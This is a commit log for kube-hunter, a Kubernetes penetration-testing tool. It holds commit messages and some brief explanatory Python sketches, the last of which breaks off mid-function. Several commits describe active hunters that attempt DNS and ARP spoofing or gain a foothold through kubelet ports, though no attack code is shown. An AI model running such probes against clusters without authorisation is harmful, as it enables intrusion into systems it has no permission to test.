Compare commits


171 Commits

Author SHA1 Message Date
danielsagi
812cbe6dc6 removed aquadev 2020-12-06 15:52:01 +02:00
danielsagi
85cec7a128 Added codeql analysis workflow 2020-12-06 15:47:05 +02:00
danielsagi
f95df8172b added a release workflow for a linux binary (#421) 2020-12-04 13:45:03 +02:00
danielsagi
a3ad928f29 Bug Fix: Pyinstaller prettytable error (#419)
* added a specific problematic-hooks folder for compiling with pyinstaller. added a fix for the prettytable import

* fixed typo

* lint fix
2020-12-04 13:43:37 +02:00
danielsagi
22d6676e08 Removed Travis and Greetings workflows (#415)
* removed greetings workflow, and travis

* Update the build status badge to point to Github Actions
2020-12-04 13:42:38 +02:00
danielsagi
b9e0ef30e8 Removed Old Dependency For CAP_NET_RAW (#416)
* removed old dependency for cap_net_raw, by stopping the use of traceroute when running as a pod

* removed unused imports
2020-12-03 17:11:18 +02:00
RDxR10
693d668d0a Update apiserver.py (#397)
* Update apiserver.py

Added description of KHV007

* fixed linting issues

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-28 19:41:06 +02:00
RDxR10
2e4684658f Update certificates.py (#398)
* Update certificates.py

Regex expression update for email

* fixed linting issues

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-28 18:55:14 +02:00
Hugo van Kemenade
f5e8b14818 Migrate tests to GitHub Actions (#395) (#399)
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-28 17:34:30 +02:00
danielsagi
05094a9415 Fix lint comments (#414)
* removed unused get query to port forward

* moved existing code to comments

Co-authored-by: Liz Rice <liz@lizrice.com>
2020-11-28 17:16:57 +02:00
danielsagi
8acedf2e7d updated screenshot of aqua's site (#412) 2020-11-27 16:04:38 +02:00
danielsagi
14ca1b8bce Fixed false positive on test_run_handler (#411)
* fixed wrong check on test run handler

* changed method of testing to be using 404 with real post method
2020-11-19 17:41:33 +02:00
danielsagi
5a578fd8ab More intuitive message when ProveSystemLogs fails (#409)
* fixed wrong message for when proving audit logs

* fixed linting
2020-11-18 11:35:13 +02:00
danielsagi
bf7023d01c Added docs for exposed pods (#407)
* added doc _kb for exposed pods

* correlated the new khv to the Exposed pods vulnerability

* fixed linting
2020-11-17 15:22:06 +02:00
danielsagi
d7168af7d5 Change KB links to avd (#406)
* changed link to point to avd

* changed kb_links to be on the base report module, and updated them to point to avd. now json output returns the full avd url for the vulnerability

* switched to adding a new avd_reference instead of changing the VID

* added newline to fix linting
2020-11-17 14:03:18 +02:00
Hugo van Kemenade
35873baa12 Upgrade syntax for supported Python versions (#394) (#401)
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-16 20:40:28 +02:00
Sinith
a476d9383f Update KHV005.md (#403) 2020-11-08 18:42:41 +02:00
Hugo van Kemenade
6a3c7a885a Support Python 3.9 (#393) (#400)
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-07 15:59:44 +02:00
A N U S H
b6be309651 Added Greeting Github Actions (#382)
* Added Greeting Github Actions

* feat: Updated the Message

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-07 15:16:14 +02:00
Monish Singh
0d5b3d57d3 added the link to the contribution page (#383)
* added the link to the contribution page

users can directly go to the contribution page from here after reading the readme file

* added it to the table of contents

* Done

sorry for my prev. mistake, now it's fixed.

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-11-07 15:07:39 +02:00
Milind Chawre
69057acf9b Adding --log-file option (#329) (#387) 2020-11-07 15:01:30 +02:00
Itay Shakury
e63200139e fix azure spn hunter (#372)
* fix azure spn hunter

* fix issues

* restore tests

* code style

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-10-19 13:53:50 +03:00
Itay Shakury
ad4cfe1c11 update gitignore (#371)
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-10-19 13:03:46 +03:00
Zoltán Reegn
24b5a709ad Increase evidence field length in plain report (#385)
Given that the Description tends to go over 100 characters as well, it
seems appropriate to loosen the restriction of the evidence field.

Fixes #111

Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-10-19 12:49:43 +03:00
Jeff Rescignano
9cadc0ee41 Optimize images (#389) 2020-10-19 12:27:22 +03:00
danielsagi
3950a1c2f2 Fixed bug in etcd hunting (#364)
* fixed etcd version hunting typo

* changed self.protocol in other places on etcd hunting. this is a typo, protocol is a property of events, not hunters

Co-authored-by: Daniel Sagi <daniel@example.com>
Co-authored-by: Liz Rice <liz@lizrice.com>
2020-09-04 13:28:03 +01:00
Sanka Sathyaji
7530e6fee3 Update job.yml for Kubernetes cluster jobs (#367)
The existing job.yml has the wrong command, ["python", "kube-hunter,py"]; it should be changed to command ["kube-hunter"]

Co-authored-by: Liz Rice <liz@lizrice.com>
2020-09-04 12:15:24 +01:00
danielsagi
72ae8c0719 reformatted files to pass new linting (#369)
Co-authored-by: Daniel Sagi <daniel@example.com>
2020-09-04 12:01:16 +01:00
danielsagi
b341124c20 Fixed bug in certificate hunting (#365)
* stripping was incorrect due to multiple newlines in the certificate returned from ssl.get_server_certificate

* changed ' to " for linting

Co-authored-by: Daniel Sagi <daniel@example.com>
2020-09-03 15:06:51 +01:00
danielsagi
3e06647b4c Added multistage build for Dockerfile (#362)
* removed unnecessary files from final image, using multistaged build

* added ebtables and tcpdump packages to multistage

Co-authored-by: Daniel Sagi <daniel@example.com>
2020-08-21 14:42:02 +03:00
danielsagi
cd1f79a658 fixed typo (#363) 2020-08-14 19:09:06 +03:00
Liz Rice
2428e2e869 docs: fix broken CONTRIBUTING link (#361) 2020-07-03 11:59:53 +03:00
Abdullah Garcia
daf53cb484 Two new kubelet active hunters. (#344)
* Introducing active hunters:

- FootholdViaSecureKubeletPort
- MaliciousIntentViaSecureKubeletPort

* Format

Updating code according to expected linting format.

* Format

Updating code according to expected linting format.

* Format

Updating code according to expected linting format.

* Format

Updating code according to expected linting format.

* Testing

Update code according to expected testing standards and implementation.

* Update documentation.

- Added some more mitigations and updated the references list.

* f-string is missing placeholders.

- flake8 is marking this line as an issue as it lacks a placeholder when indicating the use of f-string; corrected.

* Update kubelet.py

- Add network_timeout parameter into requests.post and requests.get execution.

* Update kubelet.py

- Modified name of variable.

* Update kubelet.py and test_kubelet.py

- Remove certificate authority.

* Update kubelet.py and test_kubelet.py.

- Introducing default number of rm attempts.

* Update kubelet.py and test_kubelet.py.

- Introduced number of rmdir and umount attempts.

* Update kubelet.py

- Modified filename to match kube-hunter description.

* Update several files.

- Instated the use of self.event.session for GET and POST requests.
- Testing modified accordingly to complete coverage of changes and introduced methods.
- Requirements changed such that the required version that supports sessions mocking is obtained.

* Update kubelet.py

- Introduced warnings for the following commands in case of failure: rm, rmdir, and umount.

* Update kubelet.py

- Remove "self.__class__.__name___" from self.event.evidence.

* Update kubelet.py

- Remove unnecessary message section.

* Update files.

- Address class change.
- Fix testing failure after removing message section.

* Update kubelet.py

- Provide POD and CONTAINER as part of the warning messages in the log.

Co-authored-by: Abdullah Garcia <abdullah.garcia@jpmorgan.com>
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
Co-authored-by: danielsagi <danielsagi2009@gmail.com>
2020-06-29 09:20:49 +01:00
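A hedged sketch of the session-plus-timeout request pattern those bullets describe (the class and handler names here are simplified stand-ins, not the exact kube-hunter API):

import requests

class KubeletEvent:
    """Simplified stand-in for a kube-hunter event that carries a shared session."""

    def __init__(self, host, port=10250):
        self.host = host
        self.port = port
        self.session = requests.Session()
        self.session.verify = False  # kubelets commonly serve self-signed certificates

def probe_secure_port(event, network_timeout=5.0):
    # Reuse the event's session and always pass an explicit timeout, mirroring
    # the network_timeout parameter added to the requests.get/post calls above.
    url = f"https://{event.host}:{event.port}/pods"
    try:
        return event.session.get(url, timeout=network_timeout)
    except requests.RequestException:
        return None  # a failure here is logged as a warning, not a crash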
danielsagi
d6ca666447 Minor hunting bug fixes (#360)
* fixed f string

* fixed wrong iteration on list when getting random pod

* added '/' suffix to path on kubelet debug handlers tests

* also fixed minor bug in etcd, protocol was referenced on the hunter and not on the event

* ran black format

* moved protocol to be https

* ran black again

* fixed PR comments

* ran black again, formatting
2020-06-26 15:04:29 +01:00
danielsagi
3ba926454a Added External Plugins Support (#357)
* added plugins submodule, created two hookspecs, one for adding arguments, one for running code after the argument parsing

* implemented plugins application on main file, changed mechanism for argument parsing

* changed previous parsing function to not create the ArgumentParser, and implemented it as a hook for the parsing mechanism

* added pluggy to required deps

* removed unnecessary add_config import

* fixed formatting using black

* restored main link file from master

* moved import of parser to right before the register call, to avoid circular imports

* added tests for the plugins hooks

* removed blank line space

* black reformat
2020-06-19 15:20:15 +01:00
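For readers unfamiliar with pluggy, the two-hookspec mechanism described above works roughly like this (a minimal sketch; the hook names follow the commit's description, but the exact signatures are assumptions):

import argparse
import pluggy

hookspec = pluggy.HookspecMarker("kube-hunter")
hookimpl = pluggy.HookimplMarker("kube-hunter")

class HookSpecs:
    @hookspec
    def parser_add_arguments(self, parser):
        """Hook for plugins to add their own CLI arguments."""

    @hookspec
    def load_plugin(self, args):
        """Hook that runs after argument parsing completes."""

class ExamplePlugin:
    @hookimpl
    def parser_add_arguments(self, parser):
        parser.add_argument("--example-flag", action="store_true")

    @hookimpl
    def load_plugin(self, args):
        if args.example_flag:
            print("example plugin activated")

pm = pluggy.PluginManager("kube-hunter")
pm.add_hookspecs(HookSpecs)
pm.register(ExamplePlugin())

parser = argparse.ArgumentParser()
pm.hook.parser_add_arguments(parser=parser)   # plugins extend the parser
args = parser.parse_args(["--example-flag"])
pm.hook.load_plugin(args=args)                # plugins run after parsing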
Konstantin Weddige
78e16729e0 Fix typo (#354)
This fixes #353
2020-06-08 13:47:40 +01:00
danielsagi
78c0133d9d removed an unnecessary f-string on an info logging (#355) 2020-06-08 15:04:29 +03:00
Liz Rice
4484ad734f Fix CertificateDiscovery hunter for Python3 (#350)
* update base64 decode for python3

* chore: remove lint error about imports
2020-05-11 10:42:31 +01:00
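The Python 3 pitfall behind this fix: base64.b64decode returns bytes, so string work needs an explicit decode (a general illustration, not the exact hunter code):

import base64

encoded = base64.b64encode(b"client@example.com embedded in a certificate")

decoded = base64.b64decode(encoded)   # bytes under Python 3, str under Python 2
assert isinstance(decoded, bytes)

text = decoded.decode("utf-8")        # decode explicitly before regex/string work
print(text)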
Yehuda Chikvashvili
a0127659b7 Decouple config and argument parsing (#342)
* Make config initialized explicitly
* Add mypy linting
* Make tests run individually
Resolve #341
2020-04-26 19:37:16 +03:00
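A hedged sketch of the explicit-initialization pattern this change describes (the get_config/set_config names follow kube-hunter's conf package, but treat the details as assumptions):

from dataclasses import dataclass

@dataclass
class Config:
    active: bool = False
    network_timeout: float = 5.0

_config = None

def set_config(config):
    """Initialize the global config explicitly, e.g. from parsed CLI args."""
    global _config
    _config = config

def get_config():
    if _config is None:
        raise RuntimeError("set_config() must be called before get_config()")
    return _config

# At startup, after argument parsing (and in tests, independently per test):
set_config(Config(active=True))
assert get_config().active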
Yehuda Chikvashvili
f034c8c7a1 Removed unused imports (#338)
* Update snippets in README.md
The README file had deprecated code snippets
* Remove unnecessary imports
* Complete tests for hunters registration

Resolves #334
2020-04-23 02:31:07 +03:00
mormamn
4cb2c8bad9 Dashboard hunter not working (#337)
* Fix dashboard hunter regression
Fix #336.
Add tests for dashboard hunter

Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-04-13 04:06:13 +03:00
Yehuda Chikvashvili
14d73e201e Remove dynamic imports (#335)
* Remove plugins
Current usage of plugins is not pluggable and includes logging
stuff.
Move this to conf/logging.
* Removed dynamic imports
* Add tests for hunters registration
2020-04-13 02:56:13 +03:00
John Schaeffer
6d63f55d18 Updated logging init logic to not log on setting --log=none (#323)
* Fix "none" logging

Test for different logging levels, existing and non-existing

Co-authored-by: yoavrotems <yoavrotems97@gmail.com>
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-04-12 16:56:53 +03:00
mormamn
124a51d84f Support ignoring IPs (#332)
* Support ignoring IPs

Closes #296
2020-04-07 21:47:50 +03:00
Yehuda Chikvashvili
0f1739262f Linting Standards (#330)
Fix linting issues with flake8 and black.
Add pre-commit configuration, update documentation for it.
Apply linting check in Travis CI.
2020-04-05 05:22:24 +03:00
mormamn
9ddf3216ab Optimize Cloud Discovery (#325)
* Optimized Cloud Discovery
Removed redundant actions of getting cloud type.
Make cloud discovery a lazy action.
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-03-29 22:59:38 +03:00
Yehuda Chikvashvili
e7585f4ed3 Logging revamped (#318)
* Refine logging
Use logger objects instead of global root logger
Fixes #308 
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-03-04 21:03:36 +02:00
Yehuda Chikvashvili
6c34a62e39 Network operations timeout (#317)
* Add network operations timeout

This commit adds a --network-timeout flag whose value is used as the
configurable timeout for network operations, so a demanding user
can set it to the desired value.
2020-03-04 16:59:18 +02:00
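A minimal sketch of wiring such a flag through argparse (the default value here is an assumption for illustration):

import argparse

parser = argparse.ArgumentParser()
parser.add_argument(
    "--network-timeout",
    type=float,
    default=5.0,  # assumed default, for illustration only
    help="timeout for network operations, in seconds",
)
args = parser.parse_args(["--network-timeout", "10"])

# Every socket/HTTP call then passes args.network_timeout explicitly,
# so a slow or unresponsive target cannot hang the scan indefinitely.
print(args.network_timeout)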
blrchen
69a31f87e9 Fix #127 Insecure Azure Cloud IP detection (#315)
* Fix Insecure Azure Cloud IP detection
Remove verify=False

Co-authored-by: blairch <15134348+blairch@users.noreply.github.com>
Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-03-03 01:10:16 +02:00
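The security point behind removing verify=False: requests validates TLS certificates by default, and verify=False silently disables that (a generic illustration; the URL is a placeholder, not the detection service kube-hunter queries):

import requests

url = "https://example.com"  # placeholder for the cloud IP detection service

# Insecure (what the fix removed): certificate validation disabled.
# requests.get(url, verify=False, timeout=5)

# Secure default: verify=True is implied, so a man-in-the-middle presenting
# a bogus certificate raises requests.exceptions.SSLError instead of succeeding.
response = requests.get(url, timeout=5)
print(response.status_code)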
dependabot[bot]
f33c04bd5b Bump nokogiri from 1.10.4 to 1.10.8 in /docs (#311)
Bumps [nokogiri](https://github.com/sparklemotion/nokogiri) from 1.10.4 to 1.10.8.
- [Release notes](https://github.com/sparklemotion/nokogiri/releases)
- [Changelog](https://github.com/sparklemotion/nokogiri/blob/master/CHANGELOG.md)
- [Commits](https://github.com/sparklemotion/nokogiri/compare/v1.10.4...v1.10.8)

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: Liz Rice <liz@lizrice.com>
2020-03-02 15:23:39 +00:00
Yehuda Chikvashvili
11efbb7514 Fix Dockerfile build (#303)
* Fix Dockerfile build

The Docker build used a 2-step installation of requirements
and application.
This was broken by #272.

Fixes #300

* Add dependencies cache for docker build

Caching installation requirements saves time when building
2020-02-27 14:37:25 +02:00
mormamn
ac5dd40b74 Urllib3 upgrade (#314)
* Upgrade urllib3
resolves #307
2020-02-27 00:17:08 +02:00
mormamn
bf646f5e0c Fix broken reporting (#313)
Added instance creation of reporters and dispatcher objects
Fixes #312
2020-02-26 22:40:16 +02:00
mormamn
a8128b7ea0 Cleanup conf refactor (#310)
Reorganize config files, and argparse.
Resolves #289
Resolves #292
2020-02-25 12:29:18 +02:00
Yehuda Chikvashvili
e75c0ff37b Add PyInstaller build (#302)
* Add PyInstaller build

Use PyInstaller to generate single binary.
Use staticx to generate a single static binary.

Resolves #301

* Add test Makefile target

Add test to Makefile.
Add requests_mock to dev dependencies.
2020-02-18 17:31:10 +02:00
Liz Rice
fe187bc50a Correct KB link (#299) 2020-02-14 17:44:58 +00:00
Yehuda Chikvashvili
77227799a4 Add Makefile (#298)
Added Makefile with some helpful utils such as build, lint and clean
2020-02-12 17:32:28 +02:00
Vipul Gupta
df12d75d6d Packaging Kube-Hunter for PyPi (#272)
* Initial Commit

Signed-off-by: Vipul Gupta (@vipulgupta2048) <vipulgupta2048@gmail.com>

* Suggestions implemented as suggested

Signed-off-by: Vipul Gupta (@vipulgupta2048) <vipulgupta2048@gmail.com>

* Package with setuptools

Use setuptools to package kube-hunter as redistributable file.
Once packaged, it can be pushed to PyPI.
The package version is taken from git tags (using setuptools_scm).

Closes #185

* Ignore __main__.py script in code coverage

The entrypoint script should not be tested itself but should rather call
into tested modules.
Ideally, __main__ should only make a call to a single function from
another tested module.

* Update requirements files

Use install_requires from setup.cfg file as single source of truth
for dependencies.
Install regular dependencies when installing dev dependencies.

* Symlink kube-hunter.py to entry point

Support the old way to run kube-hunter via the main script by making
a link to the new kube_hunter/__main__.py script.

Co-authored-by: Yehuda Chikvashvili <yehudaac1@gmail.com>
2020-02-10 21:35:31 +02:00
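A minimal sketch of the version-from-git-tags arrangement described above (kube-hunter keeps most metadata in setup.cfg; the entry-point target follows the symlink bullet but is an assumption):

# setup.py -- minimal sketch; the real project reads metadata from setup.cfg
from setuptools import find_packages, setup

setup(
    name="kube-hunter",
    use_scm_version=True,                 # version derived from git tags
    setup_requires=["setuptools_scm"],
    packages=find_packages(),
    entry_points={
        "console_scripts": [
            # puts a `kube-hunter` executable on PATH that calls the package's main()
            "kube-hunter=kube_hunter.__main__:main",
        ],
    },
)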
Yehuda Chikvashvili
a4a8c71653 Fix empty report (#281)
* Fix empty report when active hunting

Running kube-hunter active hunting with plain report
did not show any report.
This commit changes Vulnerability.vid default value
to "None" (previously None)

Closes #280

* Improve debug and exception messages

Debugging hunters execution is hard due to lack of debug
information. No indication is made when a hunter starts.
Exceptions were printed without a stack trace, which made
it difficult to follow.
2020-01-09 19:04:33 +02:00
Yehuda Chikvashvili
fe3dba90d8 Refactor configuration (#283)
* Remove __main__ references and create a top-level config module

* Move conf module into separate standalone package

* Deprecate install_imports.py script

* Rename root package to kube_hunter

The previous src root package name was too generic and not unique,
so it could not be used as an external name.
Change `src` to `kube_hunter` so it can be referenced in a clear way.
Additional changes made on the way:
* Make imports absolute
* Formatting

Relates to #185

* remove todos

Co-authored-by: Ryan Lahfa <masterancpp@gmail.com>
Co-authored-by: Itay Shakury <itay@itaysk.com>
2019-12-29 14:18:58 +02:00
Oleg Butuzov
fd4d79a853 adding code coverage (#198) 2019-11-30 08:45:33 +00:00
Liz Rice
3326171c7a docs: clarify that job.yaml is an example (#279) 2019-11-27 18:42:35 +02:00
Liz Rice
4c82b68f48 Merges #225 (#278)
* Fix typos

* Fix review comments
2019-11-26 21:11:33 +02:00
Yehuda Chikvashvili
1d7bdd6131 Consider patched versions as not vulnerable by default (#220)
* Consider patched versions as not vulnerable by default

Change `--ignore-downstream` to `--ignore-patched-versions` and
invert its effect.
From now on, kube-hunter will not alert patched components as default
behavior.

Resolves #194

* Rename flag --ignore-patched-versions to --include-patched-versions
2019-11-26 20:28:30 +02:00
Itay Shakury
14c49922da mention KB in the readme (#276)
Co-Authored-By: Liz Rice <liz@lizrice.com>
2019-11-15 21:54:14 +02:00
Greg Jacobs
1c443eb6e4 Fixes for typos and readability in Readme.md and KB (#248) 2019-11-12 14:08:47 +02:00
Itay Shakury
12f5b75733 Refactor reporters and add KB URL to reports (#275)
* refactor reporters and add kburl

* rename json reporter file to align with other reporters
2019-11-10 15:21:36 +02:00
s-nirali
7b77945ebd Fix some linting issues (#267) 2019-11-08 13:07:37 +02:00
Ryan Lahfa
a266c9068f Locking: Use a RAII/Defensive style to prevent issues when exceptions are thrown (#269) 2019-11-07 19:10:37 +02:00
Anuj Singh
67af48fa9a Create a sitemap (#258) 2019-11-05 21:48:05 +02:00
Yehuda Chikvashvili
efd23433ff Support macOS (#273)
Upgrade scapy to version 2.4.3 and above.
This commit fixes IndexError that was raised when running
kube-hunter from macOS.

Resolves #262
2019-11-05 12:53:44 +02:00
Itay Shakury
8cc90db8f5 add kb index (#252) 2019-10-30 20:38:16 +02:00
Itay Shakury
0157ac83ce add .venv to gitignore (#256) 2019-10-28 23:40:16 +02:00
Rohith
031c4b9707 responding to bug report https://github.com/aquasecurity/kube-hunter/issues/246 (#249)
/usr/bin/env python generally defaults to the version set by the Linux distribution. On some distros that's python 2, and on others python 3; changing it to python3 might work
2019-10-26 19:05:13 +03:00
Raj Chowdhury
25333b201f Typo fix (#247)
Fixed Minor typos in README
2019-10-25 11:54:27 -07:00
Nithin-183
bde288ceb3 Update README.md (#237) 2019-10-25 11:42:10 -07:00
Arpit Pandey
f61f624d29 Fix typos in code comments (#227) 2019-10-23 19:10:01 +03:00
Ryan Lahfa
d424fcd7c8 Use set rather than list to test membership in O(1) (#231) 2019-10-23 18:34:19 +03:00
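This change is the classic container-choice optimization: membership tests scan a list linearly but hash into a set in O(1) on average. A tiny illustration:

import timeit

items_list = list(range(100_000))
items_set = set(items_list)

# Worst case for the list: the probed value sits at the end.
print(timeit.timeit(lambda: 99_999 in items_list, number=100))  # linear scans
print(timeit.timeit(lambda: 99_999 in items_set, number=100))   # hash lookups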
Itay Shakury
04fc39c810 build article titles from metadata (#238)
* rename id to vid to avoid conflict with jekyll's id

* build article title from metadata
2019-10-23 18:22:37 +03:00
Ramshah Jahangir
59543346d2 updating pull request template (#242)
* updating pull request template

* fixing typos
2019-10-23 18:12:43 +03:00
Itay Shakury
6b4f13e84a update ruby gems used for the kb website (#236) 2019-10-23 14:03:00 +03:00
michizhou
d8037434a0 Improved documentation (#201) 2019-10-23 11:16:49 +01:00
suijaa
a8428a9445 typo fix in KHV050.md 2019-10-22 09:03:07 +03:00
Sidhya Tikku
6969f02e9b Create PULL_REQUEST_TEMPLATE.md (#222) 2019-10-20 15:41:02 +03:00
Mislav Cimperšak
91e4388e53 adding multiple templates for github issues (#224) 2019-10-20 15:28:49 +03:00
Sidhya Tikku
c27bcb48de Update .gitignore (#221) 2019-10-19 15:00:25 +03:00
Soumyadeep Sinha
300fd117c9 Fixed Some typos (#199)
* Fixed some typos

* Fixed some typos
2019-10-18 18:55:47 +03:00
Manuel Rüger
195ce52111 .travis.yml: Simplify and extract dev reqs (#219)
With Xenial being default, the yaml can be simplified.

Also extract requirements for development, so users can install them easily.
2019-10-18 18:03:48 +03:00
SinithH
7f5d81e68e fixed some typos (#195)
* Update README.md

* Update README.md

* Update README.md

* Replace missing "if"

* Update README.md
2019-10-18 17:39:54 +03:00
Aayush Srivastava
6a80cdede5 Update README.md (#196)
* Update README.md

Added license details (and linked to the license page) and improved the readability of the README file.

* Update README.md

Co-Authored-By: Nikita Titov <nekit94-08@mail.ru>
2019-10-18 17:32:54 +03:00
Sumit Kharche
a877d86c13 Added license & docker image badge (#197)
* Added license badge in README.md

* Removed spaces at end of file.
2019-10-18 16:49:39 +03:00
Manuel Rüger
e145f8f4a4 Dockerfile: Use apk with --no-cache (#204)
Signed-off-by: Manuel Rüger <manuel@rueg.eu>
2019-10-18 16:32:16 +03:00
Steffin Stanly
3747b85552 Update README.md (#202) 2019-10-18 16:27:49 +03:00
Mohan Sha
4df3908772 Added table of contents for easier navigation (#211) 2019-10-18 15:58:54 +03:00
Itay Shakury
817070ea30 document api access vulnerabilities (#205)
* document apiinfodisclosure vuln

* fix relative url
2019-10-18 15:50:53 +03:00
Itay Shakury
b4029225dd document DNS spoofing vulnerability (#206)
* document dnsspoof vuln

* fix relative url
2019-10-18 15:40:39 +03:00
Manuel Rüger
1395389c62 kb: typo endoint -> endpoint (#214) 2019-10-18 15:32:34 +03:00
Itay Shakury
8602e2a603 fix navigation url when searching for kb article (#210)
* fix navigation url

* add baseurl
2019-10-18 15:16:20 +03:00
Itay Shakury
f67c437a36 document kubelet vulns (#209) 2019-10-16 18:28:34 +03:00
godaji
6ff4627f9b Rename camel var to snake style. (#182) 2019-10-15 08:51:35 +03:00
Itay Shakury
4e68ea4e15 Add Knowledge Base for reported vulnerabilities (#188) 2019-10-13 17:10:47 +03:00
SinithH
e982f291e9 fixed some typos (#193)
* Update README.md

* Update README.md

* Update README.md

* Replace missing "if"
2019-10-10 10:17:23 +01:00
Itay Shakury
3b13e5980f add contributing guide (#189) 2019-10-10 10:10:27 +01:00
Adam Hauze
bed2a1fe4a Updated README to include documentation around python venv (#187)
* Updated README to include documentation around python venv

* Tidy PR

Add link to Virtual Environments docs
Remove Mac-specific instruction about brew
Remove non-installation instructions from installation section

* Tidy PR

Remove run instruction from installation section
2019-10-04 13:09:25 +02:00
Yehuda Chikvashvili
bc00bbd058 Change CVE hunters description (#183)
Make CVE hunters description more accurate
2019-10-02 16:32:09 +02:00
Yehuda Chikvashvili
a1feb06ec7 Ignore downstream version flag (#181)
* Ignore downstream version flag

This commit adds `--ignore-downstream` flag to kube-hunter.
Enabling the flag will make kube-hunter consider patched versions
as not vulnerable.
Resolves #179

* Add test cases and refine argument description
2019-09-19 21:57:39 +03:00
Pierre-Yves Aillet
c4e1e1e48c removing the footnote (#178)
* removing the footnote

the underlying issue has been closed, so the footnote can be removed

* removing another note

spotted another note and reference to the issue in the README
2019-09-08 11:42:23 +03:00
danielsagi
e0bacd6e7b New Hunters: DNS spoofing & ARP spoofing (#159)
* added arp passive hunter

* separated arp and dns hunters, made them active and fixed some code on arp

* added description for hunters, and refactored description for vulnerabilities

* minor typo

* replaced google.com with 1.1.1.1

* fixed comments

* fixed scapy

* validated output of get_kube_dns_ip_mac
2019-08-29 19:08:53 +03:00
danielsagi
a015f259a0 added linkage of previously discovered protocol, on filter (#176) 2019-08-29 16:46:35 +03:00
Yehuda Chikvashvili
8bb8e1f16c Fix plain report with high log level (#175)
This commit fixes issue #108
Report type plain didn't work with log level higher than INFO.
2019-08-29 14:34:44 +03:00
danielsagi
427a295c8c Adding visibility for dispatching (#166)
* minor addition to description

* added documentation in readme

* minor changes to logging levels and formatting

* changed example in readme

* fixed merge

* added info logging to http dispatch method

* changed description from environ to environment variables
2019-08-28 12:18:58 +03:00
danielsagi
0315af75cf Detection for 3 new CVES (#173)
* changed version hunting to be on a new version disclosure vulnerability

* fixed version publish

* added logging and fixed typo

* changed whole way of comparing versions in cve hunter

* changed K8sVersionDisclosure vulnerability to one core vulnerability, that takes an endpoint. changed all usage

* added tests

* merged kubectl cve hunting with apiserver hunting. and simplified the code of apiserver cve hunting

* fixed tests to new names

* changed name of module to cves.py

* drastically improved the cve vulnerable detection utility function. now works with all types of versioning methods

* added packaging in requirements.txt

* added another test, and improved logic on cve comparison for more complicated versions

* changed CveHunter to subscribe_once, to prevent duplicates

* fixed tests for new improvements

* removed unnecessary ternary on doc

* removed unnecessary join split

* improved compare function, made it util

* improved cve checking to use mapping

* added detection for CVE-2019-9512 and  CVE-2019-9514

* added detection for CVE-2019-11247 and added minor comments
2019-08-27 22:03:29 +03:00
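A hedged sketch of the version-comparison approach those bullets describe, using the packaging library the PR adds to requirements.txt (the matching rule is illustrative, not kube-hunter's exact logic):

from packaging.version import parse

def is_vulnerable(fix_versions, check_version):
    # Strip downstream/vendor suffixes such as "-gke.1" so parse() can compare.
    checked = parse(check_version.split("-")[0])
    for fix in fix_versions:
        fixed = parse(fix)
        # Vulnerable if the checked version is on the same minor line
        # but older than the release that fixed it.
        if checked.release[:2] == fixed.release[:2] and checked < fixed:
            return True
    return False

# CVE-2019-11247 was fixed in 1.13.9, 1.14.5 and 1.15.2 (illustrative usage):
print(is_vulnerable(["1.13.9", "1.14.5", "1.15.2"], "v1.13.5"))  # True
print(is_vulnerable(["1.13.9", "1.14.5", "1.15.2"], "v1.15.3"))  # False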
danielsagi
2dad27a175 Decrease vulnerabilities on build (#170)
* changed python version to 3.8.rc and removed wireshark from build. also added a plugin to suppress scapy's warnings about the manuf file

* changed to alpine 3.10, on docker file and removed unnecessary logging suppression

* changed to python 3.7

* changed base image on builder as well
2019-08-27 11:27:17 +01:00
danielsagi
860062abeb Added Metrics Server Discovery - Distinct from Api Server (#167)
* added basic metrics server discovery

* improved discovery, and added KNOWN PORTS usage

* improved apiserver decision

* fixed bug with comparison of IP addresses in kubeservicehost

* improved description of api server discovery

* added checks with auth_token on discovery

* fixed bug in version requests and added to tests

* added an abstract 'unrecognized API' event, and a filter for it for classification

* changed filtering to be done on the same event

* fixed verify on session and removed unnecessary enum

* minor changes to comments

* added detailed explanation
2019-08-27 08:54:08 +01:00
danielsagi
259f707ecd Refactor And Major Bug Fixes in Version and CVE hunting (#162)
* changed version hunting to be on a new version disclosure vulnerability

* fixed version publish

* added logging and fixed typo

* changed whole way of comparing versions in cve hunter

* changed K8sVersionDisclosure vulnerability to one core vulnerability, that takes an endpoint. changed all usage

* added tests

* merged kubectl cve hunting with apiserver hunting. and simplified the code of apiserver cve hunting

* fixed tests to new names

* changed name of module to cves.py

* drastically improved the cve vulnerable detection utility function. now works with all types of versioning methods

* added packaging in requirements.txt

* added another test, and improved logic on cve comparison for more complicated versions

* changed CveHunter to subscribe_once, to prevent duplicates

* fixed tests for new improvements

* removed unnecessary ternary on doc

* removed unnecessary join split

* improved compare function, made it util

* improved cve checking to use mapping
2019-08-27 08:48:47 +01:00
danielsagi
44e6438d37 Changed name of Subnet scanning to - Interface Scanning (#169)
* changed Subnet/internal scanning to interface

* Change one more internal -> interface
2019-08-25 20:40:30 +03:00
danielsagi
f5b72d44b5 New Core Feature: Subscribe Once (#168)
* added a subscribe_once decorator

* created tests for core functionality, for now, subscribe and subscribe_once
2019-08-13 15:44:41 +01:00
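Conceptually, subscribe_once is a subscription that unregisters itself after its first matching event (a hedged sketch of the idea, not kube-hunter's implementation):

class EventQueue:
    """Minimal event bus sketch with subscribe and subscribe-once semantics."""

    def __init__(self):
        self.subscribers = {}  # event type -> list of (callback, once)

    def subscribe(self, event_type, callback, once=False):
        self.subscribers.setdefault(event_type, []).append((callback, once))

    def publish(self, event):
        handlers = self.subscribers.get(type(event), [])
        for callback, once in list(handlers):
            callback(event)
            if once:
                # subscribe_once: drop the handler after its first trigger
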